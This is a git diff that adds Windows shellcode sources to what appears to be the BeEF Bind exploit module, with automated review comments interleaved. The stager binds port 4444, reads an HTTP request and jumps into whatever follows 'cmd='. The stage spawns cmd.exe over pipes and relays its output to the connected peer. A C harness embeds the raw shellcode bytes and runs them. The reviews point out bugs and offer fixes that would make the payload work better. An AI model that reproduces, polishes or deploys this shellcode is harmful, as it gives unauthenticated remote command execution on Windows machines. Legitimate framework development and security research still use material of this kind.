+[ORG 0] ;code starts at offset 0
+
+ cld ;clear the direction flag
+ call start ;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+ pop ebp ;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stage.asm" ;setup web listener to proxy requests and responses to the shell
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
new file mode 100644
index 000000000..5dc580486
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0] ;code starts at offset 0
+
+ cld ;clear the direction flag
+ call start ;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+ pop ebp ;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stager.asm" ;setup bind port, receive web request, locate stage, execute it
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
new file mode 100644
index 000000000..a939bd498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
@@ -0,0 +1,36 @@ +/** + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +A standalone version can be compiled with MinGW: +c:\MinGW\bin>gcc -o beefstager.exe beefstager.c + +and then executed with: +c:\MinGW\bin>beefstager.exe 1234 + +or just with the default port 4444: +c:\MinGW\bin>beefstager.exe +**/ + + +#include + +char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6"; + +int main(int argc, char **argv) +{ +if (argc == 2){ + int port; + port = atoi(argv[1]); + if (port <= 0xFFFF){ + code[200] = ((port & 0xFF00) >> 8) & 0xFF; + code[201] = ((port & 0xFF)); + } +} + +int (*func)(); +func = (int (*)()) code; +(int)(*func)(); + return 0; +} 
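Review bot: The port check `if (port <= 0xFFFF){` accepts the 0 that `atoi` returns for non-numeric input and any negative value, so `code[200]`/`code[201]` are patched with the low 16 bits of a bogus number instead of the argument being rejected; tighten it to `if (port > 0 && port <= 0xFFFF){`, or parse with `strtol` and check the end pointer. The `#include` line as rendered names no header — presumably `<stdlib.h>` was lost in extraction, and it is the header `atoi` needs. The header comment builds and runs `beefstager.c`/`beefstager.exe` while the file is committed as `socket.c`, so the comment should name the actual file; and `(int)(*func)();` casts a result that is then discarded, for which `(void)` is the conventional spelling.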
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm new file mode 100644 index 000000000..2acc13dde --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm 
@@ -0,0 +1,97 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] + +; Input: The hash of the API to call and all its parameters must be pushed onto stack. +; Output: The return value from the API call will be in EAX. +; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention) +; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered. +; Note: This function assumes the direction flag has allready been cleared via a CLD instruction. +; Note: This function is unable to call forwarded exports. + +api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor edx, edx ; Zero EDX + mov edx, [fs:edx+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list +next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name +loop_modname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase +not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to itterate the export address table, + mov edx, [edx+16] ; Get 
this modules base address + mov eax, [edx+60] ; Get PE header + add eax, edx ; Add the modules base address + mov eax, [eax+120] ; Get export tables RVA + test eax, eax ; Test if no export address table is present + jz get_next_mod1 ; If no EAT present, process the next module + add eax, edx ; Add the modules base address + push eax ; Save the current modules EAT + mov ecx, [eax+24] ; Get the number of function names + mov ebx, [eax+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + ; Computing the module hash + function hash +get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want +loop_funcname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + ; If found, fix up stack, call the function and then value else compute the next one... 
+ pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... +finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... +get_next_mod: ; + pop eax ; Pop off the current (now the previous) modules EAT +get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp short next_mod ; Process this module \ No newline at end of file diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm new file mode 100644 index 000000000..c88ab6e23 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm 
@@ -0,0 +1,177 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +;INPUT: EBP is block_api. + +%include "src/block_virtualalloc.asm" + ; Input: None + ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000 + ; Clobbers: EAX, EBX, ECX, EDX + + mov esi, eax ; point esi to start of buffer, used as pseudo-frame pointer + +%include "src/block_pipes.asm" + ; Create pipes to redirect stage stdin, stdout, stderr + ; Input: EBP is api_call + ; Output: + ; esp+00 child stdin read file descriptor (inherited) + ; esp+04 child stdin write file descriptor (not inherited) + ; esp+08 child stdout read file descriptor (not inherited) + ; esp+12 child stdout write file descriptor (inherited) + ; esp+16 lpPipeAttributes structure (not used after block - 12 bytes) + ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes + + mov edi,esi ; save esi since it gets clobbered + +%include "src/block_shell_pipes.asm" + ; Create process with redirected stdin, stdout, stderr to our pipes + ; Input: + ; EBP is api_call + ; esp+00 child stdin read file descriptor (inherited) + ; esp+04 not used + ; esp+08 not used + ; esp+12 child stdout write file descriptor (inherited) + ; Output: None. 
+ ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified + + mov esi,edi ; restore esi + +ReadLoop: ; Read output from the child process + +clear_buffer: + mov ecx,0xFF8 ; zero output buffer starting at esi+8 with 0xFF8 nulls + lea eax,[esi+8] ; point eax to start of command/output buffer +zero_buffer: + mov byte [eax],0 ; push a null dword + inc eax ; point to the next byte in the buffer + loop zero_buffer ; keep looping untill we have zeroed the buffer + + +response_headers: + push esi ; save pointer to start of buffer + lea edi,[esi+1048] ; set pointer to output buffer + call get_headers ; locate the static http response headers + db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a +get_headers: + pop esi ; get pointer to response headers into esi + mov ecx, 98 ; length of http response headers + rep movsb ; move the http headers into the buffer + pop esi ; restore pointer to start of buffer + + +bind_port: + push esi ; save buffer pointer onto stack +%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket + ; Input: EBP must be the address of 'api_call'. 
+ ; Output: EDI will be the newly connected clients socket + ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + + add esp, 0x1A0 ; restore stack pointer + pop esi ; restore buffer pointer + mov [esi], edi ; save external socket to buffer + + +recv: ; Receive the web request - must be a post request with command ending with a new line character + push byte 0 ; flags + push 0x400 ; allocated space for command (512 bytes) + mov ebx, esi ; start of our request/response memory buffer + add ebx, 8 ; start of our allocated command space + push ebx ; start of our allocated command space + push dword [esi] ; external socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( external_socket, buffer, size, 0 ); + +find_cmd: ; Search for "cmd=" in the web request + mov edx, [esp+0x64] ; stage stdin read file descriptor (40) + mov ecx, 0x400 ; set ecx to be our buffer counter +next: + cmp dword [ebx], 0x3d646d63 ; check if ebx points to "cmd=" + jz cmd_found ; if we found "cmd=" then parse the command + inc ebx ; point ebx to next char in request data + dec ecx ; dec our buffer counter + jecxz read_file_check ; if our counter is 0 then we found no command, so recv more data + jmp short next ; check next location for "cmd=" +cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off + add ebx, 0x03 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command + +next_cmd_char: + inc ebx ; move our command string pointer up one character + push ebx ; save command pointer to the stack + +write_file: + push 0 ; pOverlapped = NULL + lea edi,[esi+1040] ; 4 bytes for bytes written + push edi ; pBytesWritten + push 1 ; nBytesToWrite + push ebx ; command string in buffer + mov ebx,[esp+70h] ; Child stdin + push ebx ; child stdin + push 0x5BAE572D ; hash(kernel32.dll, WriteFile) + call ebp ; WriteFile + + pop ebx ; restore command pointer from the stack + cmp byte [ebx], 0x0a ; check if we have just sent a 
new line + jnz next_cmd_char ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket + + +%include "src/block_sleep.asm" + ; Input: None + ; Output: None. Sleeps for x seconds + ; Clobbers: None + +read_file_check: + xor eax, eax ; zero eax + push eax ; lpBytesLeftThisMessage + lea ebx,[esi+4] ; address to output the result - num bytes available to read + push ebx ; lpTotalBytesAvail + push eax ; lpBytesRead + push eax ; nBufferSize + push eax ; lpBuffer + lea ebx,[esp+74h] ; child stdout read address + mov ebx, [ebx] ; child stdout read file descriptor + push ebx ; hNamedPipe + push 0xB33CB718 ; hash(kernel32.dll,PeekNamedPipe) + call ebp ; PeekNamedPipe + + test eax, eax ; check the function return correctly + jz close_handle ; no, then close the connection and start again + mov eax, [esi+4] ; Grab the number of bytes available + test eax, eax ; check for no bytes to read + jz close_handle ; no, then close the connection and start again + +read_file: + push 0 ; pOverlapped = NULL + lea edi,[esi+1044] ; output: number of bytes read + push edi ; pBytesRead + push 0xB86 ; BytesToRead: remaining space in our allocated buffer + ;lea edi,[esi+1114] ; start of remaining space in buffer after response headers + lea edi,[esi+1146] ; start of remaining space in buffer after response headers + push edi ; start of remaining space in buffer after response headers + lea ebx,[esp+70h] ; child stdout read address + mov ebx, [ebx] ; child stdout read file descriptor + push ebx ; hFile: child stdout address + push 0xBB5F9EAD ; hash(kernel32.dll,ReadFile) + call ebp ; ReadFile + + +send_output: ; send buffer to the external socket + push byte 0 ; flags + push 0xBE8 ; len + lea edi,[esi+1048] ; start of output buffer + push edi ; pointer to buffer + push dword [esi] ; external socket + push 0x5F38EBC2 ; hash ( "ws2_32.dll", "send" ) + call ebp ; send(external_socket, *buf, len, flags); + + +close_handle: + push 
dword [esi] ; hObject: external socket + push 0x528796C6 ; hash(kernel32.dll,CloseHandle) + call ebp ; CloseHandle + + jmp ReadLoop + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm new file mode 100644 index 000000000..50059ad2e --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm 
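Review bot: The canned response in `response_headers` advertises `Content-Length: 3016`, but the body actually sent is 0xBE8 - 98 = 2950 bytes (`send` pushes len 0xBE8 from esi+1048, the first 98 of which are the headers, and `read_file` reads at most 0xB86 = 2950 bytes into esi+1146), so a client honouring the header waits for 66 bytes that never arrive until the socket is closed. If I have the constants right the header should read `Content-Length: 2950` (same 20-character width, so `mov ecx, 98` stays valid). The `recv` comment says `allocated space for command (512 bytes)` while the pushed size is 0x400 (1024), and `mov edx, [esp+0x64]` in `find_cmd` loads what is actually the stdout write end (the comment says stdin read) into a register nothing reads before the WriteFile call clobbers it, so that line can go. The `[esp+70h]`/`[esp+74h]` offsets for the stdin write and stdout read ends do line up with the 0x58 bytes block_shell_pipes.asm leaves on the stack.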
@@ -0,0 +1,47 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
+ ; Input: EBP must be the address of 'api_call'.
+ ; Output: EDI will be the newly connected clients socket
+ ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+%include "src/block_virtualalloc.asm"
+ ; Input: None
+ ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
+ ; Clobbers: EAX, EBX, ECX, EDX
+
+ mov esi, eax ; save pointer to buffer since eax gets clobbered
+
+recv: ; Receive the web request containing the stage
+ push byte 0 ; flags
+ push ebx ; allocated space for stage
+ push eax ; start of our allocated command space
+ push edi ; external socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( external_socket, buffer, size, 0 );
+
+
+close_handle:
+ push edi ; hObject: external socket
+ push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
+ call ebp ; CloseHandle
+
+find_cmd: ; Search for "cmd=" in the web request for our payload
+ cmp dword [esi], 0x3d646d63 ; check if ebx points to "cmd="
+ jz cmd_found ; if we found "cmd=" then parse the command
+ inc esi ; point ebx to next char in request data
+ jmp short find_cmd ; check next location for "cmd="
+cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
+; add esi,4 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command ... this compiles to 6 byte opcode
+ db 0x83, 0xC6, 0x04 ; add esi,4 ... but only 3 byte opcode
+
+ jmp esi ; jump to our stage payload
+
+
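Review bot: The `find_cmd` scan has no bound: if the request does not contain `cmd=`, `inc esi` walks past the 0x1000-byte VirtualAlloc buffer until it meets a stray `cmd=` elsewhere in memory or an unmapped page, and the `recv` byte count is never consulted (CloseHandle clobbers EAX before it could be). EBX still holds 0x1000 here (api_call and the stdcall callees preserve it), so add `mov ecx, ebx` before `find_cmd:`, replace `jmp short find_cmd` with `loop find_cmd`, and follow the loop with a jump to an exit path so a miss does not fall through into `cmd_found` and `jmp esi`. The comments on the `cmp` and `inc` lines still say `ebx` although the code uses `esi`. Whatever follows `cmd=` is executed unverified by any peer that reaches the bind port - that is the design of an unauthenticated bind stager, but it deserves a one-line note at the top of the block.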
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm new file mode 100644 index 000000000..3ac5f8c70 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm 
@@ -0,0 +1,63 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. 
+ push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + xchg edi, eax ; save the socket for later, don't care about the value of eax after this + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + + push ebx ; we set length for the sockaddr struct to zero + push ebx ; we dont set the optional sockaddr param + push edi ; listening socket + push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" ) + call ebp ; accept( s, 0, 0 ); + + push edi ; push the listening socket to close + xchg edi, eax ; replace the listening socket with the new connected socket for further comms + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm new file mode 100644 index 000000000..941564c34 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm 
@@ -0,0 +1,64 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP is api_call +; Output: +; esp+00 child stdin read file descriptor (inherited) +; esp+04 child stdin write file descriptor (not inherited) +; esp+08 child stdout read file descriptor (not inherited) +; esp+12 child stdout write file descriptor (inherited) +; esp+16 lpPipeAttributes structure (not used after block - 12 bytes) +; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes + + push 1 ; create lpPipeAtrributes structure on stack so pipe handles are inherited + push 0 + push 0x0C + +create_pipe_stdout: + push 0 ; allocate space on stack for child stdout file descriptor + mov ebx, esp ; save location of where the child stdout Write file descriptor will be + push 0 ; allocate space on stack for child stdout file descriptor + mov ecx, esp ; save location of where the child stdout Read file descriptor will be + + push 0 ; nSize + lea edi,[esp+12] ; lpPipeAttributes - inherited + push edi + push ebx ; stdout write file descriptor + push ecx ; stdout read file descriptor + push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" ) + call ebp ; CreatePipe( Read, Write, 0, 0 ) + +create_pipe_stdin: + push 0 ; allocate space on stack for child stdout file descriptor + mov ebx, esp ; save location of where the child stdout Write file descriptor will be + push 0 ; allocate space on stack for child stdout file descriptor + mov ecx, esp ; save location of where the child stdout Read file descriptor will be + + push 0 ; nSize + lea edi,[esp+20] ; lpPipeAttributes - inherited + push edi + push ebx ; stdout write file descriptor + push ecx ; stdout read file descriptor + push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" ) + call ebp ; 
CreatePipe( Read, Write, 0, 0 ) + +no_inherit_read_handle: ; ensure read and write handles to child proc pipes for are not inherited + mov ebx,[esp+8] + push 0 + push 1 + push ebx ; hChildStdoutRd is the address we set in the CreatePipe call + push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation) + call ebp ; SetHandleInformation + +no_inherit_write_handle: + mov ebx,[esp+4] + push 0 + push 1 + push ebx ; hChildStdinRw is the address we set in the CreatePipe call + push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation) + call ebp ; SetHandleInformation + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm new file mode 100644 index 000000000..33e807866 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm 
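Review bot: The `create_pipe_stdin` block's comments are a copy of the stdout block - every line says "child stdout" for what are the stdin handles, the last `SetHandleInformation` comment names `hChildStdinRw` for the stdin write end loaded from `[esp+4]`, and both hash comments say `kernel.dll` where the library is kernel32.dll. The handle plumbing itself checks out against the Output table (`[esp+8]` is the stdout read end, `[esp+4]` the stdin write end, and both get HANDLE_FLAG_INHERIT cleared), so this is documentation only: change the stdin-block comments to `stdin` and `hChildStdinWr`. Neither `CreatePipe` return value is tested, so on failure the slots stay zero and are handed to CreateProcessA by block_shell_pipes.asm as if they were valid.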
@@ -0,0 +1,56 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Credits: Some code borrowed from block_shell.asm; Stephen Fewer +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: +; EBP is api_call +; esp+00 child stdin read file descriptor (inherited) +; esp+04 not used +; esp+08 not used +; esp+12 child stdout write file descriptor (inherited) +; Output: None. +; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified + +shell: + push 0x00646D63 ; push our command line: 'cmd',0 + mov ebx, esp ; save a pointer to the command line + push dword [esp+16] ; child stdout write file descriptor for process stderr + push dword [esp+20] ; child stdout write file descriptor for process stdout + push dword [esp+12] ; child stdin read file descriptor for process stdout + xor esi, esi ; Clear ESI for all the NULL's we need to push + push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack + pop ecx ; Set ECX for the loop +push_loop: ; + push esi ; push a null dword + loop push_loop ; keep looping untill we have pushed enough nulls + mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW + lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure + mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure + ; perform the call to CreateProcessA + push esp ; Push the pointer to the PROCESS_INFORMATION Structure + push eax ; Push the pointer to the STARTUPINFO Structure + push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent + push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent + push esi ; We dont specify any dwCreationFlags + inc esi ; Increment ESI to 
be one + push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent + dec esi ; Decrement ESI back down to zero + push esi ; Set lpThreadAttributes to NULL + push esi ; Set lpProcessAttributes to NULL + push ebx ; Set the lpCommandLine to point to "cmd",0 + push esi ; Set lpApplicationName to NULL as we are using the command line param instead + push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" ) + call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi ); + ; perform the call to WaitForSingleObject +; mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure +; dec esi ; Decrement ESI down to -1 (INFINITE) +; push esi ; push INFINITE inorder to wait forever +; inc esi ; Increment ESI back to zero +; push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess +; push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" ) +; call ebp ; WaitForSingleObject( pi.hProcess, INFINITE ); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm new file mode 100644 index 000000000..4d3b57ce2 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm @@ -0,0 +1,15 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: None +; Output: None. Sleeps for specified seconds. +; Clobbers: None + + push 1000 ; milliseconds + push 0xE035F044 ; hash (kernel32.dll, Sleep) + call ebp ; Sleep(1000ms) + 
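Review bot: The comment on `push dword [esp+12]` reads `child stdin read file descriptor for process stdout`, but that push fills STARTUPINFO.hStdInput - the offsets are right (after the `cmd` push and the two handle pushes the stdin read end sits at esp+12), so only the comment is wrong: `; child stdin read file descriptor for process stdin`. The commented-out `WaitForSingleObject` block is dead code the stage does not want (it polls the pipe with PeekNamedPipe instead); delete it or say in one line why it is kept. The CreateProcessA return value and the hProcess/hThread handles in PROCESS_INFORMATION are neither checked nor closed; a `test eax, eax` after `call ebp` would let a failed spawn be detected before the stage starts writing to the stdin pipe.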
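Review bot: The header says `Output: None. Sleeps for specified seconds` and `Clobbers: None`, but the block hard-codes `push 1000` (milliseconds) and goes through `call ebp`, which block_api.asm documents as clobbering EAX, ECX and EDX. Change the header to `; Sleeps for 1000 ms (hard-coded)` and `; Clobbers: EAX, ECX, EDX (via api_call)`; the `%include` site in block_beef_bind-stage.asm repeats the `Clobbers: None` line and should follow.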
